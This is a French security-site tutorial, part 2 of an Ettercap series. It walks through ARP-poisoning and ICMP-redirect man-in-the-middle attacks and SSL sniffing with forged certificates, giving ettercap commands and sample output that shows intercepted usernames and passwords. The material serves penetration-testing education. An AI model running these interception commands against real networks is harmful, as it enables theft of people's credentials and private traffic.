Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- réseau


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Vigilance - Puppet Enterprise multiples vulnérabilités, analysé le 17 12 2014
- Vigilance - Noyau Linux boucle infinie de isofs Rock Ridge CE, analysé le 17 12 2014
- Vigilance - Fine Free file déni de service via ELF Strings, analysé le 17 12 2014
- Vigilance - Fine Free file déni de service via ELF Notes, analysé le 17 12 2014
- Vigilance - VMware vCenter Server vérification incorrecte de certificat, analysé le 05 12 2014
- Vigilance - OpenBSD déni de service via PIPEX, analysé le 05 12 2014
- Vigilance - VMware vCenter Server Appliance Cross Site Scripting, analysé le 05 12 2014
- Diebold et la Banque Internationale à Luxembourg lancent le retrait d'argent à partir du téléphone mobile et sans carte bancaire
- La certification de sécurité des réseaux intelligents en Europe défis et recommandations
- Vigilance - Qemu corruption de mémoire via cirrus, analysé le 04 12 2014
- 272 - Mon ebanking a une faille de sécurité dois-je paniquer
- Vigilance - WordPress Cart66 Lite injection SQL, analysé le 04 12 2014
- 10 mars F5 Forum Paris 2015
- Anti-fraude Dhimyotis lance la Carte ID 2D-Origin
- Fabrice Coquio, président d'Interxion France Internet des Objets, tous les data centers pourront-ils répondre à l'ensemble des défis

Dernier articles de SecuObs :
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles
- #LPM2013: Un nouvel espoir ?
- L'ANSSI durcit le ton

Revue de presse internationale :
- CODE Reverse engineering Omegle
- Pirate Bay Domain Back Online, Waving a Pirate Flag
- PuttyRider- Tool to hijack putty sessions
- Farm Hack An Open Source Community for Resilient Agriculture
- Judge It's OK For Cops To Create Fake Instagram Accounts
- 3 Best VPNs for Android
- Apple bought NeXT 18 years ago apple NeXT
- Bitcoin Exec To Spend Two Years Behind Bars For Silk Road Transactions
- Plug Into USB, Get a Reverse Shell
- School district says students hacked online portal
- DEF CON 22 I am a legend Hacking Hearthstone with machine learning
- DEF CON 22 How to you Feel about your Mother Psych and The SE
- DEF CON 22 How To Get Phone Companies To Just Say No To Wiretapping
- DEF CON 22 How to Disclose an Exploit Without Getting in Trouble
- DEF CON 22 Home Alone with localhost Automating Home Defense

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- STIX standardise l’échange des informations relatives aux attaques cybernétiques
- Le ministère de l'intérieur censure une conférence au Canada
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- Mises à jour en perspective pour le système Vigik
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- [Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection
- Les russes ont-ils pwn le système AEGIS ?
- [IDS Snort Windows – Partie 2] Installation et configuration
- WPA Cracker un cluster en ligne de 400 CPU et un dictionnaire de 135 millions d'entrées pour casser, ou pas, WPA/WPA2-PSK en 20 minutes

Top bi-hebdo de la revue de presse
- LampSec CTF4, encore plus vite

Top bi-hebdo de l'annuaire des videos
- Comment creer un server botnet!!!!(Réseau de pc zombies)

Top bi-hebdo de la revue Twitter

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Tutoriels

English version with Google Translate

[Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing

Par Moussa Diallo, secuobs.com
Le 04/10/2006


Résumé : Présentation des différentes interfaces d'utilisation de Ettercap. Description des possibilités d'attaques ARP Poisoning et Man in The Middle avec Ettercap, ainsi que leur intégration dans les attaques de type SSL sniffing. - Lire l'article



L'interface

Ettercap permet d'utiliser trois interfaces distinctes. Une interface graphique en GTK, une interface en mode texte qui utilise ncurses et la dernière en mode texte, ligne de commande. Nous allons principalement nous intéresser à cette dernière.

La page d'aide peut être affichée avec la commande classique --help, ce qui permettra d'afficher les options de la ligne de commande les plus courantes.


$ ettercap --help


Etre au milieu ...

Nous allons tout d'abord procéder à l'attaque de base afin de se positionner en "homme du milieu". Pour cela nous allons attaquer la machine de la victime afin de corrompre son cache ARP (ARP poisoning) et de se retrouver en position favorable pour la suite des opérations.


Ettercap -T -M arp /192.168.1.27/ /192.168.1.254/


On lance Ettercap en mode texte (option -T), on active l'attaque de MItM (option -M) en utilisant la technique de la corruption de cache ARP (option arp) entre les hôtes 192.168.1.27 et 192.168.1.254.

Une fois que l'attaque a réussi, l'attaquant est en position d'homme du milieu et de ce fait en position pour intercepter les communications. Toutes les requêtes en provenance de l'hôte 192.168.1.27 à destination de l'hôte 192.168.1.254 vont transiter par la machine de l'attaquant 192.168.1.200.

Dans notre architecture l'hôte 192.168.1.254 est le routeur de sortie vers internet. Si l'on veut être capable de sniffer les connexions distantes transitant par la passerelle, entre l'hôte victime 192.168.1.27 et l'Internet, il est nécessaire d'ajouter le paramètre "remote" à l'option "arp" dans la ligne de commande.


ettercap -T -M arp:remote /192.168.1.27/ /192.168.1.254/


Il sera alors aisé de récupérer un certain nombre de données sensibles (mots de passe ?!) entre la victime et le reste du monde.


ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:12:3F:F9:2B:A0 192.168.1.200 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |===========================>| 100.00 %

5 hosts added to the hosts list...

ARP poisoning victims:
GROUP 1: 192.168.1.27 00:0B:6A:50:33:46

GROUP 2: ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP: 193.34.36.37 -> USER: Administrateur PASS: password_secret INFO: monsiteweb.com/admin/



Lors d'une identification via un formulaire il est possible d'indiquer dans le fichier etter.fields (/usr/share/ettercap) au dissecteur HTTP d'Ettercap les champs qui correspondent au login et au mot de passe afin que ce dernier puisse s'en servir.

Une autre méthode proposée par Ettercap, afin de mettre en place une attaque de MitM, est l’utilisation de l’ICMP redirect. En envoyant des paquets "ICMP redirect" un attaquant peut demander à un équipement réseau à ce que tous les paquets émis lui soient transmis (il se fait passer pour le routeur par défaut).

La syntaxe est sensiblement identique à l'attaque précédente. Il faut simplement modifier le type d'attaque qui n'est plus ARP mais ICMP.


SSL sniffing

Ettercap permet également des attaques sur des protocoles chiffrés comme HTTPS.

En temps normal lorsqu'un client se connecte à un serveur Web utilisant le protocole HTTPS, ils échangent leurs données via un tunnel SSL dans lequel les données HTTP sont encapsulées. Si un attaquant était amené à intercepter les données il ne pourrait pas les déchiffrer.

Grossièrement nous pourrions résumer la connexion HTTPS comme suit :

- le client établit une connexion vers un serveur HTTPS,
- le serveur lui présente son certificat
- le client vérifie la validité du certificat (dans l’idéal …),
- si le certificat est valide le client crée une clé de session qu'il va chiffrer avec le certificat du serveur.
- le serveur déchiffre la clé de session
- les deux parties utilisent la clé de session commune pour chiffrer et échanger leurs données.

La sécurité des échanges va donc dépendre du certificat du serveur et surtout de la confiance que va lui porter le client. La validité d'un certificat repose sur trois points :

- avoir été émis par une autorité de confiance.
- être en cours de validité
- correspondre au nom de domaine du site

Si ces conditions ne sont pas respectées le client verra apparaître une fenêtre (pop-up) l'informant que le certificat n'est pas valide pour une (ou plusieurs) des trois raisons précédentes. Si le certificat est valide, la connexion se fait de manière transparente et aucun pop-up n'apparaît.

Nous allons voir comment exploiter avec Ettercap la confiance de l'utilisateur afin de récupérer le trafic émis dans le tunnel chiffré.

L'attaque repose sur l'acceptation par la victime d'un certificat invalide. L'attaquant se place en homme du milieu de la même façon que précédemment (par exemple en effectuant une attaque d'ARP cache poisoning entre la victime et la passerelle internet) puis va intercepter la requête HTTPS de la victime vers le serveur et lui présenter un faux certificat (de préférence ressemblant le plus possible au vrai).

Si le client accepte le certificat, Ettercap va établir un tunnel SSL entre le client et l'attaquant. Il va ensuite établir un second tunnel SSL vers le serveur légitime. Cette position permet donc à l'attaquant de chiffrer/déchiffrer les données des deux cotés et ainsi de récupérer les données du client avant de les transmettre au serveur de destination.

Ettercap va donc échanger le vrai certificat avec le sien. Le faux certificat est créé à la volée et tous les champs sont remplis en fonction de ceux du certificat original, présenté par le serveur. Seul l'émetteur du certificat est modifié et il est signé avec la clé privée de Ettercap, que l'on peut trouver (suivant les distributions) dans le fichier suivant : /usr/share/ettercap/etter.ssl.crt

On se place en homme du milieu :


ettercap -T -M arp:remote /192.168.1.27/ /192.168.1.254/


Lorsque la victime fera une requête vers un site HTTPS, Ettercap présentera le faux certificat et après acceptation du certificat, par l'utilisateur, toutes les informations transmises par la victime pourront être déchiffrées.


HTTP : 64.233.183.99:443
-> USER: too_secure PASS: aZ3bnG*/if INFO:
//www.google.com/accounts/ServiceLogin?s
service=mail&passive=true&rm=false&continue
=//mail.google.com/mail/?ui=html&zy=ls
<mpl=yj_blanco



Autres ressources dans ce dossier

[Ettercap – Partie 1] Introduction et rappels - lien

[Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection - lien

[Ettercap – Partie 4] Contre mesure, conclusion et webographie - lien



- Article suivant : [Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection
- Article précédent : [Ettercap – Partie 1] Introduction et rappels
- Article suivant dans la catégorie Tutoriels : [Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection
- Article précédent dans la catégorie Tutoriels : [Ettercap – Partie 1] Introduction et rappels

Les derniers commentaires publiés pour cet article:
- Man-in-the-Middle Attacks against the chipTAN comfort Online Banking System ...
- Jean, depuis la rédaction de ce document les protections navigateur pour alerter les utilisateurs vis-à-vis des faux certificats ont évolué, néanmoins des techniques alternatives sont maintenant utili ...
- J'utilise Ettercap pour le protocole HTTPS , mais l'attaque est détectée : ça affiche un problème de sécurité, et ça bloque presque la page . Qu'est-ce que je dois faire pour empecher cela ? ...
- Excellent!!! Rien à ajouter. :D ...

Les derniers commentaires de la catégorie Tutoriels:
- UPDATE Snort 2.9.1.1 ...
- Apache Issues Patch To Stop Reverse-Proxy Bypass Attack ...
- ESRT @HackerTheDude @r0bertmart1nez @xanda @morenops - Kernel hacking the BSD way, new post ...
- ESRT @room362 - The Dirty Little Secrets They Didn't Teach You In Pentesting Class ...
- ESRT @jcran @dkarg - Metasploit Payloads VS Libemu - Alienvault Labs ...

Les derniers articles de la catégorie Tutoriels :
- PktAnon un framework pour l anonymat des traces PCAP
- [NessusWX – Partie 2] Audits et conclusion
- [NessusWX – Partie 1] Introduction, installation et configuration
- [IDS Snort Windows – Partie 4] Conclusion et webographie
- [IDS Snort Windows – Partie 3] Exemple de fichier de configuration
- [IDS Snort Windows – Partie 2] Installation et configuration
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- [Sécurité et PHP - Partie 5] Astuces
- [Sécurité et PHP - Partie 4] Remote PHP Vulnerabilty Scanner
- [Sécurité et PHP - Partie 3] Les failles PHP




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :